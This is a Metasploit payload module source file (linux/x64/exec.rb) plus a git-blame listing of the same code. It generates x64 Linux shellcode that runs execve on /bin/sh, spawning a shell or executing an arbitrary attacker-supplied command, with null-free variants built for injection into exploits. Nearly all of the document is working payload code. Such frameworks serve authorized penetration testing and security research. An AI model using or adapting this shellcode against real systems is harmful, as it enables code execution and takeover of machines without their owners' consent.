modules/payloads/singles/linux/x64/exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = 44

  include Msf::Payload::Single
  include Msf::Payload::Linux::X64::Prepends

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Execute Command',
        'Description' => 'Execute an arbitrary command or just a /bin/sh shell',
        'Author' => [
          'ricky',
          'Geyslan G. Bem <geyslan[at]gmail.com>'
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_X64
      )
    )

    register_options(
      [
        OptString.new('CMD', [ false, 'The command string to execute' ]),
      ]
    )
    register_advanced_options(
      [
        OptBool.new('NullFreeVersion', [ true, 'Null-free shellcode version', false ])
      ]
    )
  end

  def generate(_opts = {})
    cmd = datastore['CMD'] || ''
    nullfreeversion = datastore['NullFreeVersion']

    if cmd.empty?
      #
      # Builds the exec payload which executes a /bin/sh shell.
      # execve("/bin/sh", NULL, NULL)
      #
      if nullfreeversion
        # 22 bytes (null-free)
        payload = <<-EOS
            mov rax, 0x68732f6e69622f2f
            cdq                     ; edx = NULL

            push rdx
            push rax
            push rsp
            pop rdi                 ; "//bin/sh"

            push rdx
            pop rsi                 ; NULL

            push 0x3b
            pop rax

            syscall                 ; execve("//bin/sh", NULL, NULL)
        EOS

      else
        # 21 bytes (not null-free)
        payload = <<-EOS
            mov rax, 0x68732f6e69622f
            cdq                     ; edx = NULL

            push rax
            push rsp
            pop rdi                 ; "/bin/sh"

            push rdx
            pop rsi                 ; NULL

            push 0x3b
            pop rax

            syscall                 ; execve("/bin/sh", NULL, NULL)
        EOS
      end
    else
      #
      # Dynamically builds the exec payload based on the user's options.
      # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)
      #
      pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)

      if nullfreeversion
        if cmd.length > 0xffff
          raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller
        end

        if cmd.length <= 0xff # 255
          breg = 'bl'
        else
          breg = 'bx'
          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
            cmd += ' '
          end
        end
        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"

        # 48 bytes without cmd (null-free)
        payload = <<-EOS
            mov rax, 0x68732f6e69622f2f
            cdq                     ; edx = NULL

            jmp tocall              ; jmp/call/pop cmd address
          afterjmp:
            pop rbp                 ; *CMD*

            push rdx
            pop rbx
            #{mov_cmd_len_to_breg}  ; mov (byte/word) (bl/bx), cmd.length
            mov [rbp + rbx], dl     ; NUL '\0' terminate cmd

            push rdx
            #{pushw_c_opt}
            push rsp
            pop rsi                 ; "-c"

            push rdx
            push rax
            push rsp
            pop rdi                 ; "//bin/sh"

            push rdx                ; NULL
            push rbp                ; *CMD*
            push rsi                ; "-c"
            push rdi                ; "//bin/sh"
            push rsp
            pop rsi                 ; ["//bin/sh", "-c", "*CMD*"]

            push 0x3b
            pop rax

            syscall                 ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
          tocall:
            call afterjmp
            db "#{cmd}"             ; arbitrary command
        EOS
      else
        # 37 bytes without cmd (not null-free)
        payload = <<-EOS
            mov rax, 0x68732f6e69622f
            cdq                     ; edx = NULL

            push rax
            push rsp
            pop rdi                 ; "/bin/sh"

            push rdx
            #{pushw_c_opt}
            push rsp
            pop rsi                 ; "-c"

            push rdx                ; NULL
            call continue
            db "#{cmd}", 0x00       ; arbitrary command
          continue:
            push rsi                ; "-c"
            push rdi                ; "/bin/sh"
            push rsp
            pop rsi                 ; ["/bin/sh", "-c", "*CMD*"]

            push 0x3b
            pop rax

            syscall                 ; execve("/bin/sh", ["/bin/sh", "-c", "*CMD*"], NULL)
        EOS
      end
    end
    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
  end
end
big msftidy pass, ping me if there are issues 2011-10-23 11:56:13 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
big msftidy pass, ping me if there are issues 2011-10-23 11:56:13 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
payloads/x64: exec.rb metasm, refactoring 2021-04-09 21:50:18 -03:00			`CachedSize = 44`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 15:31:04 -05:00
Added Linux x64 payloads. Modified exe.rb to support elf x64 payloads. 2011-05-20 23:51:19 +00:00			`include Msf::Payload::Single`
fix(payloads): updating prepend mixin in payloads 2025-01-14 09:31:03 -05:00			`include Msf::Payload::Linux::X64::Prepends`
Added Linux x64 payloads. Modified exe.rb to support elf x64 payloads. 2011-05-20 23:51:19 +00:00
			`def initialize(info = {})`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`super(`
			`merge_info(`
			`info,`
			`'Name' => 'Linux Execute Command',`
			`'Description' => 'Execute an arbitrary command or just a /bin/sh shell',`
			`'Author' => [`
			`'ricky',`
			`'Geyslan G. Bem <geyslan[at]gmail.com>'`
			`],`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_X64`
			`)`
			`)`
Added Linux x64 payloads. Modified exe.rb to support elf x64 payloads. 2011-05-20 23:51:19 +00:00
			`register_options(`
			`[`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`OptString.new('CMD', [ false, 'The command string to execute' ]),`
			`]`
			`)`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`register_advanced_options(`
			`[`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`OptBool.new('NullFreeVersion', [ true, 'Null-free shellcode version', false ])`
			`]`
			`)`
Added Linux x64 payloads. Modified exe.rb to support elf x64 payloads. 2011-05-20 23:51:19 +00:00			`end`

modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`def generate(_opts = {})`
			`cmd = datastore['CMD'] \|\| ''`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`nullfreeversion = datastore['NullFreeVersion']`

			`if cmd.empty?`
			`#`
			`# Builds the exec payload which executes a /bin/sh shell.`
			`# execve("/bin/sh", NULL, NULL)`
			`#`
			`if nullfreeversion`
			`# 22 bytes (null-free)`
			`payload = <<-EOS`
			`mov rax, 0x68732f6e69622f2f`
			`cdq ; edx = NULL`

			`push rdx`
			`push rax`
			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rdi ; "//bin/sh"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`push rdx`
			`pop rsi ; NULL`

			`push 0x3b`
			`pop rax`

Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`syscall ; execve("//bin/sh", NULL, NULL)`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`EOS`

			`else`
			`# 21 bytes (not null-free)`
			`payload = <<-EOS`
			`mov rax, 0x68732f6e69622f`
			`cdq ; edx = NULL`

			`push rax`
			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rdi ; "/bin/sh"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`push rdx`
			`pop rsi ; NULL`

			`push 0x3b`
			`pop rax`

Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`syscall ; execve("/bin/sh", NULL, NULL)`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`EOS`
			`end`
			`else`
			`#`
			`# Dynamically builds the exec payload based on the user's options.`
			`# execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)`
			`#`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`if nullfreeversion`
			`if cmd.length > 0xffff`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`end`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`if cmd.length <= 0xff # 255`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`breg = 'bl'`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`else`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`breg = 'bx'`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`cmd += ' '`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`end`
			`end`
			`mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"`

			`# 48 bytes without cmd (null-free)`
			`payload = <<-EOS`
			`mov rax, 0x68732f6e69622f2f`
			`cdq ; edx = NULL`

			`jmp tocall ; jmp/call/pop cmd address`
			`afterjmp:`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rbp ; CMD`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`push rdx`
			`pop rbx`
			`#{mov_cmd_len_to_breg} ; mov (byte/word) (bl/bx), cmd.length`
			`mov [rbp + rbx], dl ; NUL '\0' terminate cmd`

			`push rdx`
			`#{pushw_c_opt}`
			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rsi ; "-c"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`push rdx`
			`push rax`
			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rdi ; "//bin/sh"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`push rdx ; NULL`
			`push rbp ; CMD`
			`push rsi ; "-c"`
			`push rdi ; "//bin/sh"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rsi ; ["//bin/sh", "-c", "CMD"]`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`push 0x3b`
			`pop rax`

Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`syscall ; execve("//bin/sh", ["//bin/sh", "-c", "CMD"], NULL)`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`tocall:`
			`call afterjmp`
			`db "#{cmd}" ; arbitrary command`
			`EOS`
			`else`
			`# 37 bytes without cmd (not null-free)`
			`payload = <<-EOS`
			`mov rax, 0x68732f6e69622f`
			`cdq ; edx = NULL`

			`push rax`
			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rdi ; "/bin/sh"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`push rdx`
			`#{pushw_c_opt}`
			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rsi ; "-c"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`push rdx ; NULL`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`call continue`
			`db "#{cmd}", 0x00 ; arbitrary command`
			`continue:`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`push rsi ; "-c"`
			`push rdi ; "/bin/sh"`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`push rsp`
Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`pop rsi ; ["/bin/sh", "-c", "CMD"]`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00
			`push 0x3b`
			`pop rax`

Comment out several additional parts of the shellcode for better clarity 2021-04-12 17:26:46 -05:00			`syscall ; execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)`
payloads/x64: exec.rb new behaviour 2021-04-10 00:00:34 -03:00			`EOS`
			`end`
			`end`
payloads/x64: exec.rb metasm, refactoring 2021-04-09 21:50:18 -03:00			`Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string`
Added Linux x64 payloads. Modified exe.rb to support elf x64 payloads. 2011-05-20 23:51:19 +00:00			`end`
			`end`